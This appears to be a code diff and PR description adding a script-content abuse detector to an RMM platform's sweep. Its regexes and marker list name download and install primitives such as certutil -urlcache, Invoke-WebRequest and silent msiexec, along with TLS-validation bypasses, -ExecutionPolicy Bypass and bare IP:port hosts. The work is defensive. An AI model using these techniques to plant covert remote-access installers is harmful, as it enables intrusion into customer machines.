+// Stage-1 gate, part B: ...AND carry an install/fetch primitive.
+const INSTALL_OR_FETCH =
+  /msiexec|\/qn\b|\/quiet\b|\/silent\b|\/verysilent\b|invoke-webrequest|\biwr\b|webclient|downloadfile|downloaddata|start-bitstransfer|certutil\s+-urlcache/i;
+
+// Stage-2 marker patterns.
+const TLS_BYPASS = /TrustAllCertsPolicy|ICertificatePolicy|ServerCertificateValidationCallback/i;
+const EXEC_POLICY_BYPASS = /-ExecutionPolicy\s+Bypass/i;
+const BARE_IP_PORT_URL = /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}:\d{2,5}/i;
+const BARE_IP_PORT_HOST = /^\d{1,3}(?:\.\d{1,3}){3}:\d{2,5}$/;
+const UNATTENDED_E_ACCESS = /[?&]e=access\b/i;
+const UNATTENDED_Y_GUEST = /[?&]y=guest\b/i;
+
+const URL_AUTHORITY = /https?:\/\/([^\s"'`<>()[\]{}\\|,;]+)/gi;
+
+const SAVED_FILENAME_PATTERNS: ReadonlyArray<RegExp> = [
+  /-OutFile\s+["']?([^\s"';]+)/gi,
+  /-Destination\s+["']?([^\s"';]+)/gi,
+  /\.DownloadFile\(\s*[^,]+,\s*["']([^"']+)["']/gi,
+  /msiexec(?:\.exe)?["']?[^\n]*?\/i\s+["']?([^\s"';]+)/gi,
+];
+
+// Filename stems too generic to call "misleading" (setup.exe is not a lie).
+const GENERIC_FILENAME_STEMS: ReadonlySet<string> = new Set([
+  'setup', 'install', 'installer', 'agent', 'client', 'remote', 'support',
+  'temp', 'tmp', 'package', 'update', 'updater', 'app', 'tool', 'file',
+  'download', 'deploy', 'run', 'bin', 'out', 'output',
+]);
+
+// Host labels that carry no branding — ignored when deciding whether a
+// download host relates to the partner or the vendor.
+const GENERIC_HOST_LABELS: ReadonlySet<string> = new Set([
+  'www', 'dl', 'download', 'downloads', 'get', 'cdn', 'files', 'file',
+  'app', 'apps', 'my', 'portal', 'remote', 'support', 'help', 'update',
+  'updates', 'static', 'assets', 'storage', 'mirror', 'pkg', 'packages',
+]);
+
+export interface ScriptIndicators {
+  /** Throwaway TLDs (no leading dot), lowercase. EMPTY by default — populate via ABUSE_SCRIPT_INDICATORS. */
+  tlds: string[];
+  /** Known-bad download hostnames (no port), lowercase. EMPTY by default. */
+  hosts: string[];
+}
+
+/**
+ * Indicator lists come from the ABUSE_SCRIPT_INDICATORS env var
+ * (JSON: {"tlds": [...], "hosts": [...]}) and default to EMPTY — the repo is
+ * public and committing real indicators would be an evasion guide.
+ */
+export function loadScriptIndicators(): ScriptIndicators {
+  const empty: ScriptIndicators = { tlds: [], hosts: [] };
+  const raw = process.env.ABUSE_SCRIPT_INDICATORS;
+  if (!raw) return empty;
+  let parsed: unknown;
+  try {
+    parsed = JSON.parse(raw);
+  } catch {
+    console.warn('[AbuseSignals] ABUSE_SCRIPT_INDICATORS is not valid JSON — using empty indicator lists');
+    return empty;
+  }
+  if (!parsed || typeof parsed !== 'object' || Array.isArray(parsed)) {
+    console.warn('[AbuseSignals] ABUSE_SCRIPT_INDICATORS must be a JSON object — using empty indicator lists');
+    return empty;
+  }
+  const toStringList = (v: unknown): string[] =>
+    Array.isArray(v) ? v.filter((x): x is string => typeof x === 'string' && x.length > 0).map((x) => x.toLowerCase()) : [];
+  const obj = parsed as Record<string, unknown>;
+  return { tlds: toStringList(obj.tlds), hosts: toStringList(obj.hosts) };
+}
+
+export interface ScriptFinding {
+  partnerId: string;
+  partnerName: string;
+  /** Domain of the partner's billing email, when present (relatedness check). */
+  partnerEmailDomain: string | null;
+  scriptId: string;
+  /** left(content, 20000); '' for execution-only findings. */
+  scriptContent: string;
+  /** This sweep's newly scanned stdout excerpts (incremental — see HWM below). */
+  executionStdouts: string[];
+  /**
+   * Hosts previously persisted for this (partner, script) in
+   * abuse_script_hosts. Keeps host-derived markers durable across sweeps even
+   * though execution stdout is only ever scanned once.
+   */
+  persistedHosts: string[];
+}
+
+export interface ScriptFindingsResult {
+  /** Findings for partners in the evaluated (active, non-deleted) scope only. */
+  findings: ScriptFinding[];
+  /** host -> distinct partner count (>= 2), computed over the FULL corpus. */
+  sharedHosts: Map<string, number>;
+  /** Partner ids whose scripts were scored this sweep — fed into evaluatedPartnerIds. */
+  scannedPartnerIds: string[];
+}
+
+/** Extract URL authorities (host[:port]) from free text. Pure; exported for tests. */
+export function extractHosts(text: string): string[] {
+  const out = new Set<string>();
+  for (const match of text.matchAll(URL_AUTHORITY)) {
+    let authority = (match[1] ?? '').split('/')[0] ?? '';
+    const at = authority.lastIndexOf('@');
+    if (at >= 0) authority = authority.slice(at + 1); // strip userinfo
+    authority = authority.replace(/[.,:'"!]+$/, '').toLowerCase();
+    if (authority.length === 0 || authority.length > 255) continue;
+    out.add(authority);
+  }
+  return [...out];
+}
+
+const hostnameOf = (host: string): string => host.split(':')[0] ?? host;
+const isIpHost = (host: string): boolean => /^\d{1,3}(?:\.\d{1,3}){3}$/.test(hostnameOf(host));
+
+const tokenize = (s: string): string[] =>
+  s.toLowerCase().split(/[^a-z0-9]+/).filter((t) => t.length >= 3);
+
+const overlaps = (label: string, tokens: readonly string[]): boolean =>
+  tokens.some((t) => label.includes(t) || (label.length >= 3 && t.includes(label)));
+
+/**
+ * A download host is "related" when a meaningful label overlaps the partner's
+ * name/email-domain tokens (their own vendor instance: acmeit.<vendor>.tld),
+ * or when EVERY meaningful label is a vendor token (the vendor's own download
+ * domain). A vendor-instance host whose instance label belongs to someone
+ * else is exactly the abuse fingerprint, so it stays unrelated.
+ */
+function hostRelated(host: string, partnerTokens: readonly string[], productTokens: readonly string[]): boolean {
+  const labels = hostnameOf(host).split('.').slice(0, -1); // drop TLD label
+  const meaningful = labels.filter((l) => l.length >= 3 && !GENERIC_HOST_LABELS.has(l) && !/^\d+$/.test(l));
+  if (meaningful.length === 0) return false;
+  if (meaningful.some((l) => overlaps(l, partnerTokens))) return true;
+  return meaningful.every((l) => overlaps(l, productTokens));
+}
+
+function extractSavedFilenameStems(text: string): string[] {
+  const stems = new Set<string>();
+  for (const re of SAVED_FILENAME_PATTERNS) {
+    for (const match of text.matchAll(re)) {
+      const raw = match[1] ?? '';
+      const base = raw.split(/[\\/]/).pop() ?? '';
+      if (base.includes('$') || base.includes('%')) continue; // variable, not a literal name
+      const stem = (base.split('.')[0] ?? '').toLowerCase().replace(/[^a-z0-9]/g, '');
+      if (stem.length >= 3) stems.add(stem);
+    }
+  }
+  return [...stems];
+}
+
+interface ScoredFinding {
+  score: number;
+  markers: string[];
+  hosts: string[];
+}
+
+function scoreFinding(
+  f: ScriptFinding,
+  sharedHosts: ReadonlyMap<string, number>,
+  cfg: SignalConfig,
+  indicators: ScriptIndicators,
+): ScoredFinding | null {
+  const text = [f.scriptContent, ...f.executionStdouts].join('\n');
+  const products = RA_PRODUCTS.filter((p) => p.pattern.test(text));
+  if (products.length === 0 || !INSTALL_OR_FETCH.test(text)) return null;
+
+  const hosts = [...new Set([...extractHosts(text), ...f.persistedHosts.map((h) => h.toLowerCase())])];
+  const productTokens = products.flatMap((p) => p.tokens);
+  const partnerTokens = [
+    ...tokenize(f.partnerName),
+    ...(f.partnerEmailDomain ? f.partnerEmailDomain.toLowerCase().split('.').slice(0, -1).filter((l) => l.length >= 3) : []),
+  ];
+
+  const minPartners = cfg['rmm.shared_installer_host.min_partners'];
+  const indicatorHostSet = new Set(indicators.hosts);
+  const markers: Array<{ name: string; weight: number }> = [];
+  const add = (name: string, weight: number) => markers.push({ name, weight });
+
+  if (TLS_BYPASS.test(text)) {
+    add('tls_bypass', cfg['rmm.remote_access_installer.marker.tls_bypass']);
+  }
+  if (hosts.some((h) => (sharedHosts.get(h) ?? 0) >= minPartners)) {
+    add('shared_host', cfg['rmm.remote_access_installer.marker.shared_host']);
+  }
+  if (indicatorHostSet.size > 0 && hosts.some((h) => indicatorHostSet.has(hostnameOf(h)))) {
+    add('indicator_host', cfg['rmm.remote_access_installer.marker.indicator_host']);
+  }
+  if (indicators.tlds.length > 0 && hosts.some((h) => indicators.tlds.some((t) => hostnameOf(h).endsWith(`.${t}`)))) {
+    add('throwaway_tld', cfg['rmm.remote_access_installer.marker.throwaway_tld']);
+  }
+  if (BARE_IP_PORT_URL.test(text) || hosts.some((h) => BARE_IP_PORT_HOST.test(h))) {
+    add('bare_ip_port', cfg['rmm.remote_access_installer.marker.bare_ip_port']);
+  }
+  const misleadingStem = extractSavedFilenameStems(text).find(
+    (stem) => !GENERIC_FILENAME_STEMS.has(stem) && !overlaps(stem, productTokens),
+  );
+  if (misleadingStem !== undefined) {
+    add('misleading_filename', cfg['rmm.remote_access_installer.marker.misleading_filename']);
+  }
+  // Bare-IP hosts are excluded here — they already scored via bare_ip_port.
+  const namedHosts = hosts.filter((h) => !isIpHost(h));
+  if (namedHosts.length > 0 && namedHosts.every((h) => !hostRelated(h, partnerTokens, productTokens))) {
+    add('unrelated_host', cfg['rmm.remote_access_installer.marker.unrelated_host']);
+  }
+  if (EXEC_POLICY_BYPASS.test(text)) {
+    add('exec_policy_bypass', cfg['rmm.remote_access_installer.marker.exec_policy_bypass']);
+  }
+  if (UNATTENDED_E_ACCESS.test(text) && UNATTENDED_Y_GUEST.test(text)) {
+    add('unattended_params', cfg['rmm.remote_access_installer.marker.unattended_params']);
+  }
+
+  const raw = cfg['rmm.remote_access_installer.gate_score'] + markers.reduce((sum, m) => sum + m.weight, 0);
+  return {
+    score: Math.min(100, Math.round(raw)),
+    markers: markers.map((m) => m.name),
+    hosts,
+  };
+}
+
+/**
+ * Pure scoring: no I/O, unit-testable. Emits per-partner:
+ *   - rmm.remote_access_installer — MAX across the partner's gated scripts.
+ *   - rmm.shared_installer_host — an extracted host appears under >=
+ *     min_partners distinct partners in the corpus.
+ * Deliberately no youngWeight()/age decay anywhere in this function.
+ */
+export function computeScriptSignals(
+  findings: ScriptFinding[],
+  sharedHosts: ReadonlyMap<string, number>,
+  cfg: SignalConfig,
+  indicators: ScriptIndicators,
+): ComputedSignal[] {
+  const minPartners = cfg['rmm.shared_installer_host.min_partners'];
+  const bestInstaller = new Map<string, { finding: ScriptFinding; scored: ScoredFinding }>();
+  const bestShared = new Map<string, { finding: ScriptFinding; host: string; partnerCount: number }>();
+
+  for (const f of findings) {
+    const scored = scoreFinding(f, sharedHosts, cfg, indicators);
+    if (scored) {
+      const prev = bestInstaller.get(f.partnerId);
+      if (!prev || scored.score > prev.scored.score) bestInstaller.set(f.partnerId, { finding: f, scored });
+    }
+
+    // Shared-host correlation does not require the install gate: the corpus
+    // is already product-prefiltered, and the same host recurring across
+    // partners is suspicious on its own.
+    const allHosts = [...new Set([...extractHosts([f.scriptContent, ...f.executionStdouts].join('\n')), ...f.persistedHosts.map((h) => h.toLowerCase())])];
+    for (const host of allHosts) {
+      const count = sharedHosts.get(host) ?? 0;
+      if (count < minPartners) continue;
+      const prev = bestShared.get(f.partnerId);
+      if (!prev || count > prev.partnerCount) bestShared.set(f.partnerId, { finding: f, host, partnerCount: count });
+    }
+  }
+
+  const signals: ComputedSignal[] = [];
+
+  for (const { finding, scored } of bestInstaller.values()) {
+    signals.push({
+      partnerId: finding.partnerId,
+      signalKey: 'rmm.remote_access_installer',
+      score: scored.score,
+      severity: scoreToSeverity(scored.score, cfg),
+      // Evidence stays compact (formatSignalAlert truncates to 800 chars):
+      // matched host(s), marker names, script id — NEVER script bodies.
+      evidence: {
+        partnerName: finding.partnerName,
+        scriptId: finding.scriptId,
+        markers: scored.markers,
+        hosts: scored.hosts.slice(0, 3),
+      },
+    });
+  }
+
+  for (const [partnerId, s] of bestShared) {
+    const score = Math.min(
+      100,
+      Math.round(
+        cfg['rmm.shared_installer_host.base_score'] +
+          cfg['rmm.shared_installer_host.per_extra_partner'] * (s.partnerCount - minPartners),
+      ),
+    );
+    signals.push({
+      partnerId,
+      signalKey: 'rmm.shared_installer_host',
+      score,
+      severity: scoreToSeverity(score, cfg),
+      evidence: {
+        partnerName: s.finding.partnerName,
+        scriptId: s.finding.scriptId,
+        host: s.host,
+        partnerCount: s.partnerCount,
+      },
+    });
+  }
+
+  return signals;
+}
+
+// ---------------------------------------------------------------------------
+// Loader
+// ---------------------------------------------------------------------------
+
+/** Bound every text read; never pull unbounded fleet-wide text. */
+const TEXT_CAP = 20_000;
+const SCRIPTS_PER_PARTNER_CAP = 25;
+const EXECUTIONS_PER_SWEEP_CAP = 5_000;
+const EXECUTION_MATCHES_PER_PARTNER_CAP = 50;
+const PERSISTED_HOSTS_PER_PARTNER_CAP = 100;
+const HOST_UPSERTS_PER_SWEEP_CAP = 2_000;
+const BACKFILL_WINDOW_DAYS = 30;
+
+const EXECUTION_SCAN_STATE_KEY = 'script_execution_scan';
+
+const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+/** Quote a validated uuid list for interpolation into sql.raw. */
+function uuidArraySql(ids: readonly string[]): string {
+  const safe = ids.filter((id) => UUID_RE.test(id));
+  return `ARRAY[${safe.map((id) => `'${id}'`).join(',')}]::uuid[]`;
+}
+
+interface PartnerRow {
+  partner_id: string;
+  partner_name: string;
+  partner_status: string;
+  partner_deleted: boolean;
+  billing_email: string | null;
+}
+
+const emailDomain = (email: string | null): string | null => {
+  if (!email) return null;
+  const at = email.lastIndexOf('@');
+  return at > 0 ? email.slice(at + 1).toLowerCase() : null;
+};
+
+/**
+ * Loads script/execution findings and maintains the abuse_script_hosts corpus.
+ * MUST run inside a system DB context — bare breeze_app reads return 0 rows.
+ *
+ * Incremental execution scan — high-water-mark choice: a tiny state row in
+ * abuse_sweep_state (key 'script_execution_scan') storing the max
+ * script_executions.created_at already scanned. Chosen over deriving from
+ * persisted host data because most executions yield no hosts, which would
+ * force rescanning. The first run backfills from now - 30 days; every sweep
+ * advances the mark over at most EXECUTIONS_PER_SWEEP_CAP rows, so the
+ * backfill is bounded and batched across hourly sweeps. Script CONTENT (not
+ * stdout) is small and re-scanned in full every sweep, which is what lets
+ * open script signals stale-resolve on real evidence (script edited/deleted).
+ */
+export async function loadScriptFindings(now: Date): Promise<ScriptFindingsResult> {
+  // --- 1. Candidate scripts (ALL partners — corpus rule) -------------------
+  const scriptRows = (await db.execute(sql`
+    WITH candidates AS (
+      SELECT s.id,
+        left(s.content, ${TEXT_CAP}) AS content,
+        COALESCE(s.partner_id, o.partner_id) AS owner_partner_id,
+        ROW_NUMBER() OVER (
+          PARTITION BY COALESCE(s.partner_id, o.partner_id)
+          ORDER BY s.updated_at DESC
+        ) AS rn
+      FROM scripts s
+      LEFT JOIN organizations o ON o.id = s.org_id
+      WHERE s.deleted_at IS NULL
+        AND s.is_system = false
+        AND COALESCE(s.partner_id, o.partner_id) IS NOT NULL
+        AND left(s.content, ${TEXT_CAP}) ~* ${RA_PRODUCT_SQL_RE}
+    )
+    SELECT c.id, c.content,
+      c.owner_partner_id AS partner_id,
+      p.name AS partner_name,
+      p.status AS partner_status,
+      (p.deleted_at IS NOT NULL) AS partner_deleted,
+      p.billing_email
+    FROM candidates c
+    JOIN partners p ON p.id = c.owner_partner_id
+    WHERE c.rn <= ${SCRIPTS_PER_PARTNER_CAP}
+  `)) as unknown as Array<PartnerRow & { id: string; content: string }>;
+
+  // --- 2. Incremental execution-stdout scan --------------------------------
+  const stateRows = (await db.execute(sql`
+    SELECT value FROM abuse_sweep_state WHERE key = ${EXECUTION_SCAN_STATE_KEY}
+  `)) as unknown as Array<{ value: { lastExecutionCreatedAt?: string } | null }>;
+  const storedMark = stateRows[0]?.value?.lastExecutionCreatedAt;
+  const since = storedMark
+    ? new Date(storedMark)
+    : new Date(now.getTime() - BACKFILL_WINDOW_DAYS * 86_400_000);
+
+  // Window upper bound FIRST, over created_at only, so the mark advances past
+  // non-matching rows too (a regex-filtered LIMIT could not tell us how far
+  // the scan actually got).
+  // Dates are bound as ISO strings + ::timestamptz — postgres.js cannot
+  // serialize raw Date params through db.execute(sql``).
+  const upperRows = (await db.execute(sql`
+    SELECT max(created_at) AS upper_bound FROM (
+      SELECT created_at FROM script_executions
+      WHERE created_at > ${since.toISOString()}::timestamptz
+        AND created_at <= ${now.toISOString()}::timestamptz
+      ORDER BY created_at ASC
+      LIMIT ${EXECUTIONS_PER_SWEEP_CAP}
+    ) w
+  `)) as unknown as Array<{ upper_bound: string | Date | null }>;
+  const upperBound = upperRows[0]?.upper_bound ? new Date(String(upperRows[0].upper_bound)) : null;
+
+  const executionRows = upperBound
+    ? ((await db.execute(sql`
+        WITH matches AS (
+          SELECT se.script_id,
+            left(se.stdout, ${TEXT_CAP}) AS stdout,
+            o.partner_id AS owner_partner_id,
+            ROW_NUMBER() OVER (PARTITION BY o.partner_id ORDER BY se.created_at DESC) AS rn
+          FROM script_executions se
+          JOIN organizations o ON o.id = se.org_id
+          WHERE se.created_at > ${since.toISOString()}::timestamptz
+            AND se.created_at <= ${upperBound.toISOString()}::timestamptz
+            AND se.stdout IS NOT NULL
+            AND left(se.stdout, ${TEXT_CAP}) ~* ${RA_PRODUCT_SQL_RE}
+        )
+        SELECT m.script_id, m.stdout,
+          m.owner_partner_id AS partner_id,
+          p.name AS partner_name,
+          p.status AS partner_status,
+          (p.deleted_at IS NOT NULL) AS partner_deleted,
+          p.billing_email
+        FROM matches m
+        JOIN partners p ON p.id = m.owner_partner_id
+        WHERE m.rn <= ${EXECUTION_MATCHES_PER_PARTNER_CAP}
+      `)) as unknown as Array<PartnerRow & { script_id: string; stdout: string }>)
+    : [];
+
+  // --- 3. Persist extracted hosts (ALL partners — corpus rule) -------------
+  const upserts = new Map<string, { partnerId: string; host: string; source: 'script' | 'execution'; scriptId: string | null }>();
+  const addUpserts = (partnerId: string, scriptId: string | null, source: 'script' | 'execution', text: string) => {
+    for (const host of extractHosts(text)) {
+      if (upserts.size >= HOST_UPSERTS_PER_SWEEP_CAP) return;
+      upserts.set(`${partnerId}|${host}|${source}`, { partnerId, host, source, scriptId });
+    }
+  };
+  for (const r of scriptRows) addUpserts(r.partner_id, r.id, 'script', r.content);
+  for (const r of executionRows) addUpserts(r.partner_id, r.script_id, 'execution', r.stdout);
+
+  if (upserts.size > 0) {
+    await db
+      .insert(abuseScriptHosts)
+      .values([...upserts.values()].map((u) => ({
+        partnerId: u.partnerId,
+        host: u.host,
+        source: u.source,
+        scriptId: u.scriptId,
+        firstSeenAt: now,
+        lastSeenAt: now,
+      })))
+      .onConflictDoUpdate({
+        target: [abuseScriptHosts.partnerId, abuseScriptHosts.host, abuseScriptHosts.source],
+        set: { lastSeenAt: now },
+      });
+  }
+
+  // --- 4. Shared-host correlation over the FULL corpus ---------------------
+  const sharedRows = (await db.execute(sql`
+    SELECT host, COUNT(DISTINCT partner_id) AS partner_count
+    FROM abuse_script_hosts
+    GROUP BY host
+    HAVING COUNT(DISTINCT partner_id) >= 2
+  `)) as unknown as Array<{ host: string; partner_count: string }>;
+  const sharedHosts = new Map(sharedRows.map((r) => [r.host, Number(r.partner_count)]));
+
+  // --- 5. Build findings for the evaluated scope only ----------------------
+  const inScope = (r: PartnerRow): boolean => r.partner_status === 'active' && !r.partner_deleted;
+
+  const findingByScript = new Map<string, ScriptFinding>();
+  const ensureFinding = (r: PartnerRow, scriptId: string): ScriptFinding => {
+    let f = findingByScript.get(scriptId);
+    if (!f) {
+      f = {
+        partnerId: r.partner_id,
+        partnerName: r.partner_name,
+        partnerEmailDomain: emailDomain(r.billing_email),
+        scriptId,
+        scriptContent: '',
+        executionStdouts: [],
+        persistedHosts: [],
+      };
+      findingByScript.set(scriptId, f);
+    }
+    return f;
+  };
+
+  for (const r of scriptRows) {
+    if (!inScope(r)) continue;
+    ensureFinding(r, r.id).scriptContent = r.content;
+  }
+  for (const r of executionRows) {
+    if (!inScope(r)) continue;
+    ensureFinding(r, r.script_id).executionStdouts.push(r.stdout);
+  }
+
+  const findings = [...findingByScript.values()];
+  const scannedPartnerIds = [...new Set(findings.map((f) => f.partnerId))];
+
+  // Attach persisted hosts so host-derived markers stay durable across sweeps
+  // (execution stdout is only scanned once).
+  if (scannedPartnerIds.length > 0) {
+    const persistedRows = (await db.execute(sql.raw(`
+      SELECT partner_id, script_id, host FROM (
+        SELECT partner_id, script_id, host,
+          ROW_NUMBER() OVER (PARTITION BY partner_id ORDER BY last_seen_at DESC) AS rn
+        FROM abuse_script_hosts
+        WHERE partner_id = ANY(${uuidArraySql(scannedPartnerIds)})
+      ) x WHERE rn <= ${PERSISTED_HOSTS_PER_PARTNER_CAP}
+    `))) as unknown as Array<{ partner_id: string; script_id: string | null; host: string }>;
+    for (const row of persistedRows) {
+      if (!row.script_id) continue;
+      const f = findingByScript.get(row.script_id);
+      if (f && f.partnerId === row.partner_id) f.persistedHosts.push(row.host);
+    }
+  }
+
+  // --- 6. Advance the high-water mark --------------------------------------
+  if (upperBound) {
+    await db.execute(sql`
+      INSERT INTO abuse_sweep_state (key, value, updated_at)
+      VALUES (
+        ${EXECUTION_SCAN_STATE_KEY},
+        ${JSON.stringify({ lastExecutionCreatedAt: upperBound.toISOString() })}::jsonb,
+        ${now.toISOString()}::timestamptz
+      )
+      ON CONFLICT (key) DO UPDATE SET value = excluded.value, updated_at = excluded.updated_at
+    `);
+  }
+
+  return { findings, sharedHosts, scannedPartnerIds };
+}

--- a/apps/api/src/services/abuseSignals/sweep.test.ts
+++ b/apps/api/src/services/abuseSignals/sweep.test.ts
@@ -6,6 +6,9 @@ const {
   computeInvariantSignals,
   loadPartnerAggregates,
   computeHeuristicSignals,
+  loadScriptFindings,
+  computeScriptSignals,
+  loadScriptIndicators,
   persistSignals,
   markDelivered,
   sendOpsAlert,
@@ -14,6 +17,9 @@ const {
   computeInvariantSignals: vi.fn(),
   loadPartnerAggregates: vi.fn(),
   computeHeuristicSignals: vi.fn(),
+  loadScriptFindings: vi.fn(),
+  computeScriptSignals: vi.fn(),
+  loadScriptIndicators: vi.fn(),
   persistSignals: vi.fn(),
   markDelivered: vi.fn(),
   sendOpsAlert: vi.fn(),
@@ -33,6 +39,7 @@ vi.mock('../../db', () => ({
 
 vi.mock('./invariants', () => ({ computeInvariantSignals }));
 vi.mock('./heuristics', () => ({ loadPartnerAggregates, computeHeuristicSignals }));
+vi.mock('./scriptContent', () => ({ loadScriptFindings, computeScriptSignals, loadScriptIndicators }));
 vi.mock('./persistence', () => ({ persistSignals, markDelivered }));
 vi.mock('../opsAlerts', () => ({ sendOpsAlert, isOpsAlertingConfigured: vi.fn(() => true) }));
 vi.mock('../abuseMetrics', () => ({ recordAbuseSignalFired, recordAbuseSweepRun: vi.fn() }));
@@ -75,6 +82,9 @@ beforeEach(() => {
   computeInvariantSignals.mockResolvedValue([]);
   loadPartnerAggregates.mockResolvedValue([agg({})]);
   computeHeuristicSignals.mockReturnValue([]);
+  loadScriptFindings.mockResolvedValue({ findings: [], sharedHosts: new Map(), scannedPartnerIds: [] });
+  computeScriptSignals.mockReturnValue([]);
+  loadScriptIndicators.mockReturnValue({ tlds: [], hosts: [] });
   persistSignals.mockResolvedValue({ toNotify: [] });
   markDelivered.mockResolvedValue(undefined);
 });
@@ -126,5 +136,36 @@ describe('runAbuseSweep', () => {
     const evaluatedPartnerIds = persistSignals.mock.calls[0]![2] as Set<string>;
     expect(evaluatedPartnerIds).toBeInstanceOf(Set);
     expect([...evaluatedPartnerIds].sort()).toEqual(['pA', 'pB']);
+  });
+
+  it('unions script-scanned partner ids into evaluatedPartnerIds so script signals can stale-resolve', async () => {
+    loadPartnerAggregates.mockResolvedValue([agg({ partnerId: 'pA' })]);
+    loadScriptFindings.mockResolvedValue({
+      findings: [],
+      sharedHosts: new Map(),
+      scannedPartnerIds: ['pA', 'pScript'],
+    });
+
+    await runAbuseSweep();
+
+    const evaluatedPartnerIds = persistSignals.mock.calls[0]![2] as Set<string>;
+    expect([...evaluatedPartnerIds].sort()).toEqual(['pA', 'pScript']);
+  });
+
+  it('includes computeScriptSignals output in the persisted signal set', async () => {
+    const scriptSignal: ComputedSignal = {
+      partnerId: 'pS',
+      signalKey: 'rmm.remote_access_installer',
+      score: 90,
+      severity: 'alert',
+      evidence: {},
+    };
+    computeScriptSignals.mockReturnValue([scriptSignal]);
+
+    const result = await runAbuseSweep();
+
+    expect(result.fired).toBe(1);
+    const persisted = persistSignals.mock.calls[0]![0] as ComputedSignal[];
+    expect(persisted).toContainEqual(scriptSignal);
   });
 });

--- a/deploy/docker-compose.prod.yml
+++ b/deploy/docker-compose.prod.yml
@@ -202,6 +202,7 @@ services:
       OPS_ALERT_EMAIL: ${OPS_ALERT_EMAIL:-}
       OPS_ALERT_LABEL: ${OPS_ALERT_LABEL:-}
       ABUSE_SIGNAL_OVERRIDES: ${ABUSE_SIGNAL_OVERRIDES:-}
+      ABUSE_SCRIPT_INDICATORS: ${ABUSE_SCRIPT_INDICATORS:-}
       # Native APNs push for the iOS app (all optional; unset = push disabled).
       # All-or-none: setting ANY of these makes the four credentials required,
       # so a half-configured relay fails at boot instead of silently at first

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -137,6 +137,7 @@ services:
       OPS_ALERT_EMAIL: ${OPS_ALERT_EMAIL:-}
       OPS_ALERT_LABEL: ${OPS_ALERT_LABEL:-}
       ABUSE_SIGNAL_OVERRIDES: ${ABUSE_SIGNAL_OVERRIDES:-}
+      ABUSE_SCRIPT_INDICATORS: ${ABUSE_SCRIPT_INDICATORS:-}
       # Native APNs push for the iOS app (all optional; unset = push disabled).
       # All-or-none: setting ANY of these makes the four credentials required,
       # so a half-configured relay fails at boot instead of silently at first


### PR DESCRIPTION
## What

Adds a script-content detector to the hourly abuse-signals sweep, emitting two new signals:

- **`rmm.remote_access_installer`** — fires when a script both mentions a remote-access product and carries an install/fetch primitive (stage-1 gate), then scores additively on corroborating suspicion markers, clamped at 100. The gate alone scores 20 — below watch — because installing remote-access software is exactly what an RMM does; only corroboration escalates. A partner takes the MAX across their scripts.
- **`rmm.shared_installer_host`** — the same extracted download host appearing under ≥2 distinct partners.

## Mechanism

- **Contract preserved**: `loadScriptFindings()` does bounded SQL + host persistence; `computeScriptSignals()` is pure and unit-tested (mirrors `heuristics.ts`).
- **Markers** (weights in `SIGNAL_DEFAULTS`, overridable via `ABUSE_SIGNAL_OVERRIDES`): TLS-validation bypass, cross-partner shared download host, env-injected indicator hits, bare IP:port in a URL, downloaded file saved under a name unrelated to the matched product, download host unrelated to the partner's name/email domain (token-overlap; a partner's own vendor instance and the vendor's own download domain stay benign), `-ExecutionPolicy Bypass`, unattended-access query params.
- **Never age-decayed**: the scorer takes no partner age input at all — a malicious installer is malicious regardless of account age.
- **Cross-tenant corpus**: download hosts are extracted and persisted for ALL partners regardless of status (the shared-host correlation needs suspended partners in the corpus) into the new system-only `abuse_script_hosts` table; signals are only attributed to active, non-deleted partners.
- **Incremental execution scan**: `script_executions.stdout` is scanned from a high-water mark kept in a tiny `abuse_sweep_state` row (chosen over deriving from persisted host data because most executions yield no hosts and would force rescans). First run backfills 30 days in bounded batches; every read is bounded (`left(col, 20000)`, per-partner row caps, 5k execution rows per sweep). Host-derived markers stay durable across sweeps via the persisted corpus.
- **Indicator lists ship EMPTY**: throwaway TLDs and known-bad hosts come only from the new `ABUSE_SCRIPT_INDICATORS` env var (JSON `{"tlds": [], "hosts": []}`) — the repo is public and committing real indicators would be an evasion guide. The scorer takes the lists as parameters; tests inject synthetic ones.
- **Stale resolution**: script-scanned partner ids are unioned into `evaluatedPartnerIds` in `runAbuseSweep()` so open script-signal rows resolve on real evidence (script edited/deleted), matching the persistence state machine.
- **Evidence stays compact**: matched hosts, marker names, script id — never script bodies.

## New tables (mirror the `partner_abuse_signals` precedent exactly)

`2026-07-25-abuse-script-hosts.sql` creates `abuse_script_hosts` and `abuse_sweep_state` — idempotent, RLS ENABLEd + FORCEd + system-only policy in the same migration, no inner BEGIN/COMMIT. Registered in `EXEMPT_TABLES` and `INTENTIONAL_UNSCOPED` in `rls-coverage.integration.test.ts`, plus a new `abuse_script_hosts` breeze_app forge suite (tenant INSERT rejected, self-partner SELECT returns zero rows, system round-trip). Neither table has an `org_id`/`device_id` column, so no org/device cascade-list registration applies; `abuse_script_hosts.partner_id` is covered by the dynamic partner-purge sweep and `ON DELETE CASCADE` (same as `partner_abuse_signals`).

## Verification

- `vitest run src/services/abuseSignals` — 65/65 pass (new table-driven scorer suite covers gate+TLS ≥90, throwaway-TLD+misleading-filename clamp at 100, bare-IP+bypass, execution-stdout-only host, injected indicator host, shared host across two partners, per-partner MAX, and the vendor-instance/vendor-domain/unattended negative ladder at 20/20/35/60).
- `tsc --noEmit` — clean.
- Fresh-DB validation on an ephemeral Postgres 16: migration applies, re-applies as a no-op, `pnpm db:check-drift` green (460 files), full `rls-coverage` contract suite 58/58 green including the new forge tests.
- Live smoke of the loader against real Postgres: attribution scope, suspended-partner corpus inclusion, HWM advance, and idempotent host upsert all verified.

## Ops follow-up

- Populate `ABUSE_SCRIPT_INDICATORS` in the production env (and map it in the droplet compose `environment:` block — value in `.env` alone is not sufficient).

🤖 Generated with [Claude Code](https://claude.com/claude-code)